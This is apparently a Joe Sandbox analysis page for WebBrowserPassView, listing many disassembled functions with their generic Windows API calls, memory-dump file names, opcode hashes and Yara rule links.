Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
String ID:
API String ID: 159017214-0
Opcode ID: b3434e175287108bd8d00d51b0c6cbae2b7fb7d9485ba0b8fd75dd7f0a2e64a6
Instruction ID: 8c387e03d8c3aade5b41685a2e02256394b39ebaaf0903d076e01eb80a76af23
Opcode Fuzzy Hash: b3434e175287108bd8d00d51b0c6cbae2b7fb7d9485ba0b8fd75dd7f0a2e64a6
Instruction Fuzzy Hash: 99115635804208FEDB00AF69DC45C9A7FB4EF45364715C27AF914AB291D7349A09CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041725A Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00417269

Strings

failed to allocate %u bytes of memory, xrefs: 00417283

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: 48d3b0d99305b5713d050b9a7aed3c2df143f476be273c6a02e7235a5e54717b
Instruction ID: 7af341f115bc0a609711c5f8cf1e2214d5d118070d6e99c1fc297229056b61f8
Opcode Fuzzy Hash: 48d3b0d99305b5713d050b9a7aed3c2df143f476be273c6a02e7235a5e54717b
Instruction Fuzzy Hash: AFE026B7F09B2263C200961AEC0568277F09FC132571A813BF95CD3280C638DC5B83AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041950E Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00419527
FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,0045EBC0,00419B7B,00000008,00000000,00000000,?,00419D38,?,00000000), ref: 00419530

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotificationSleep
String ID:
API String ID: 1821831730-0
Opcode ID: 1f38ef6d4e421f8b70049e49d582ab06bd968fb49a388c5a1d937bf22f5392b0
Instruction ID: 10c3462ac1369c784e1afd36df35bd7f7ff6f222b97f55253c388b4ed129ec9c
Opcode Fuzzy Hash: 1f38ef6d4e421f8b70049e49d582ab06bd968fb49a388c5a1d937bf22f5392b0
Instruction Fuzzy Hash: 34E0C23B104216AEC6105BB9ECA099773DAEF9A2387544236F661E61A0C7759C828624

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB92 Relevance: 2.7, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041DD36
memcmp.MSVCRT ref: 0041DD48

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: 1d55d7fb62e4bfc7d9f251faebd1bd6dd92cbbfd5fee9d1820b3c6a6745402c4
Instruction ID: 94185df667f8708a14b2030ade84f1c931118ff06ce27a9f792afb950defdc79
Opcode Fuzzy Hash: 1d55d7fb62e4bfc7d9f251faebd1bd6dd92cbbfd5fee9d1820b3c6a6745402c4
Instruction Fuzzy Hash: CA616BF1E00205EBDB10EFA599C0AEEB7B4AF05308F14447BE50597241E779AEC4DB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABBA Relevance: 2.6, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041ACAC
memset.MSVCRT ref: 0041ACC3

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 6ce8b2131ce9372664b1d15d844f834fead9c6edd7870f4bc3c7a3887a307618
Instruction ID: 7f252ec0ecd0e4e1d26eed16bae986827b7410e8c21c6190f3b3a6ca151e3a40
Opcode Fuzzy Hash: 6ce8b2131ce9372664b1d15d844f834fead9c6edd7870f4bc3c7a3887a307618
Instruction Fuzzy Hash: 72419D72605206EFCB309F64C9848AAB7F5FB143147108A2FE546C7650E738EDE5CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00431FE3 Relevance: 2.6, APIs: 2, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004320A8
memcpy.MSVCRT ref: 004320C8

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 1878bb20dd9f6738690900f6a444c21ad621b1091da3fe6c055bff6db71a3ca3
Instruction ID: ab995eb4d1ca7ebfaf0543684d840b338a59051fe429b0ee91edc3b209ed3c15
Opcode Fuzzy Hash: 1878bb20dd9f6738690900f6a444c21ad621b1091da3fe6c055bff6db71a3ca3
Instruction Fuzzy Hash: 6931B072A00214EBDB14DF58C981A9DB7B4FF44718F25949AE905AF243C3B4EE45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7D1 Relevance: 2.5, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

free.MSVCRT(?,0040B282,00000000,?,00000000), ref: 0040B7D4
free.MSVCRT(?,?,0040B282,00000000,?,00000000), ref: 0040B7DC

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5e97efbfa32821b985a34f27a6b6b563597b1101e70238cb4ba8b6ea1fd80981
Instruction ID: 5f0fdca9fe4acc2ecb8b3169f70f33f7bd062bec4b77ce871c218ba77f1467d2
Opcode Fuzzy Hash: 5e97efbfa32821b985a34f27a6b6b563597b1101e70238cb4ba8b6ea1fd80981
Instruction Fuzzy Hash: 16D048B0805B108ED7B0EF3AD801602BBF0EF08311320CE2EA0AAC2A60EB35A1049F04

Uniqueness

Uniqueness Score: -1.00%

Function 00412D29 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00412DB7: memset.MSVCRT ref: 00412DF6

Part of subcall function 0040A5EB: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00412D6B,00000000,?,00000000,?,00000000), ref: 0040A603
Part of subcall function 0040A5EB: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A617
Part of subcall function 0040A5EB: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00414002), ref: 0040A620

CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00412D75

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$Time$CloseCompareCreateHandlememset
String ID:
API String ID: 2154303073-0
Opcode ID: 661eaf95a0eb430a0c353e7e574569b8050dd2ae37d277ca5a708745728aa288
Instruction ID: da844e677e512885dbb2ef8f3ceebb0df353419e1ec893dedc4f3fc5669ae239
Opcode Fuzzy Hash: 661eaf95a0eb430a0c353e7e574569b8050dd2ae37d277ca5a708745728aa288
Instruction Fuzzy Hash: AE113072C00219ABCF01EBA5D9815DEB7B9EF84314F20046BE901F3240D6789F55CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041607F Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00416068: FreeLibrary.KERNELBASE(?,0041608B,00000000,00413FA7,?,?,?,?,?,00403CF9,?), ref: 00416074

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(?,00000000), ref: 004160B2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
String ID:
API String ID: 3150196962-0
Opcode ID: 2f6c92ede0ba8efca6cedf9ecbf51a8f1e943e388610fa79aeb44d06da783af3
Instruction ID: 5e44a2a6fa684cac6ecb61c9cf4a65bdaa199533b8bbc7fef38ccb5d0a7984e6
Opcode Fuzzy Hash: 2f6c92ede0ba8efca6cedf9ecbf51a8f1e943e388610fa79aeb44d06da783af3
Instruction Fuzzy Hash: D7F0C2711447125AE630AB7ABC02BE726988F04324F12862FF022E54D0DFACE8C48A68

Uniqueness

Uniqueness Score: -1.00%

Function 00416435 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 0041645C

Part of subcall function 004162C5: memset.MSVCRT ref: 004162E4
Part of subcall function 004162C5: _itow.MSVCRT ref: 004162FB
Part of subcall function 004162C5: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0041630A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: 53a8f7cb008b32df1684ca7605b3377537bbc048e0cddac440998cdd1c1e842b
Instruction ID: 2e5c155c25daeb658e204211e68cd4b3eb4ccd1c406d73be233cdb1e8b0034fb
Opcode Fuzzy Hash: 53a8f7cb008b32df1684ca7605b3377537bbc048e0cddac440998cdd1c1e842b
Instruction Fuzzy Hash: 7AE0BD32000209EBCF126F80EC01AAA3BA6FF04354F248469FA5814121D33299B0AB88

Uniqueness

Uniqueness Score: -1.00%

Function 00407AE2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00407AB8,?,?,00000000,00000000,00000000,00408135,00000000,00000000,?,00000000,00407AB8), ref: 00407AFE

Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 6248e0e1ab85731b74595c2f926436b00fccac0aee2fdd6da58cf3d4fee283eb
Instruction ID: 95a85ac8c1a6a3d36e5b55df11ef6633e17d41a7181f6212dfb71d7477b24dd9
Opcode Fuzzy Hash: 6248e0e1ab85731b74595c2f926436b00fccac0aee2fdd6da58cf3d4fee283eb
Instruction Fuzzy Hash: 9CE0EC76100100FFE6615B45DC05F57BBB9EBD4710F14882DB59596164C6326852CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0041686C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,00413D28,?,?,?,00403D00,?), ref: 0041687D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 55b2502085225770d96769d1b8c5d2309b5ab18a600f8ce0c91d15f552d81266
Instruction ID: 4e210ffbaa2561246213c2b34439051142da87cffede57808e984b83c24c6bff
Opcode Fuzzy Hash: 55b2502085225770d96769d1b8c5d2309b5ab18a600f8ce0c91d15f552d81266
Instruction Fuzzy Hash: 61E0F6B5901B009FC3308F1BE944417FBF8BEE46113108E6FA4AAC2A21C3B4A5898F94

Uniqueness

Uniqueness Score: -1.00%

Function 00415776 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,0041421F,00000000,000001F7,00000000), ref: 0041577D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9cfdbd8db36c6f3a9f02cb46b7a4724c96a864d80a31ec4237d8aa9250ca55a1
Instruction ID: ddb578787b485028a6fb96a9d92d5f44c017102101ddf1ac3dc5e6ba6d02f24a
Opcode Fuzzy Hash: 9cfdbd8db36c6f3a9f02cb46b7a4724c96a864d80a31ec4237d8aa9250ca55a1
Instruction Fuzzy Hash: 4CD0C932800522EFDB10AF26ED457C67378AF60351B150229AC10B34D1CB38BDAB8A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8CD Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,004100B1,00000000,00454884,00000002,?,004122A5,00000000,00000000,?), ref: 0040A8E4

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6416124c9ca8dda125adc466156433dbc3d8b3aff9fc78592fc4ee70d7722975
Instruction ID: e2b393c147c70288cfc451d322548076449ae967400f97464a64d4acce64fec1
Opcode Fuzzy Hash: 6416124c9ca8dda125adc466156433dbc3d8b3aff9fc78592fc4ee70d7722975
Instruction Fuzzy Hash: 79D0C93511020DFBDF01CF80DC06FDD7BBDEB04359F108064BA1495060D7B59A18AB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8AE Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6863c831fb060764c36d2ef328c66928a6423640fe431ba3a7638441719afc10
Instruction ID: de572b7337c3604c2e63dc95c070a23ff96247b4c3126b3268b21a980102b21a
Opcode Fuzzy Hash: 6863c831fb060764c36d2ef328c66928a6423640fe431ba3a7638441719afc10
Instruction Fuzzy Hash: D6D0C97501020DFBDF01CF80DD06FDD7B7DEB05359F508064BA0095060C7759A14AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409C82 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d7201b6ac2b644285d7a2778af57a6827c0a8e81cd3c62d8215e375c257f2314
Instruction ID: cecd821801891233278d9e4f0cdd5aea3aed6bf5cf84d435cc8cf5239d0f839c
Opcode Fuzzy Hash: d7201b6ac2b644285d7a2778af57a6827c0a8e81cd3c62d8215e375c257f2314
Instruction Fuzzy Hash: 7FC092B0240200BEFE224B10EC15F36669CD780701F2004247E00E40E0C1604E188524

Uniqueness

Uniqueness Score: -1.00%

Function 00409C9B Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 680376a1705957ae3a1bbded056498c64766bd9d2b751ddd79e3da9690a8832c
Instruction ID: adc684fa4d176c709e0b5a021f9c2e2f242b30b566e97c1e18dbffa254e16f52
Opcode Fuzzy Hash: 680376a1705957ae3a1bbded056498c64766bd9d2b751ddd79e3da9690a8832c
Instruction Fuzzy Hash: 56C012F02503007EFF304B10AC0AF37769DD7C0701F1044307E00E40E1C2A14C488524

Uniqueness

Uniqueness Score: -1.00%

Function 0040B671 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B678

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 429c3742527009a9a024f4c715caf05f687c11ae6286ff682816965235090f6c
Instruction ID: d23f394f445174d82bf5c374610f4e11a096298af16890c94d1ac581a8101d62
Opcode Fuzzy Hash: 429c3742527009a9a024f4c715caf05f687c11ae6286ff682816965235090f6c
Instruction Fuzzy Hash: 56C09BB15117014BFB305E15C40471273D49F60727F354D1DA8D2914C1D77CD440865D

Uniqueness

Uniqueness Score: -1.00%

Function 00416068 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,0041608B,00000000,00413FA7,?,?,?,?,?,00403CF9,?), ref: 00416074

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e9866dcb680b9a0d0965807e9c09656def5765bcc3968a07479bcdd52cf4d20d
Instruction ID: c4f7802c24e59161306af1403d88e20ea41b7baad8a9019303b140db1e88e420
Opcode Fuzzy Hash: e9866dcb680b9a0d0965807e9c09656def5765bcc3968a07479bcdd52cf4d20d
Instruction Fuzzy Hash: ADC04C351107018FE7218B62C949753B7E4AB00316F40C818949685850D77CE854CE18

Uniqueness

Uniqueness Score: -1.00%

Function 0044E188 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000), ref: 0044E199

Memory Dump Source
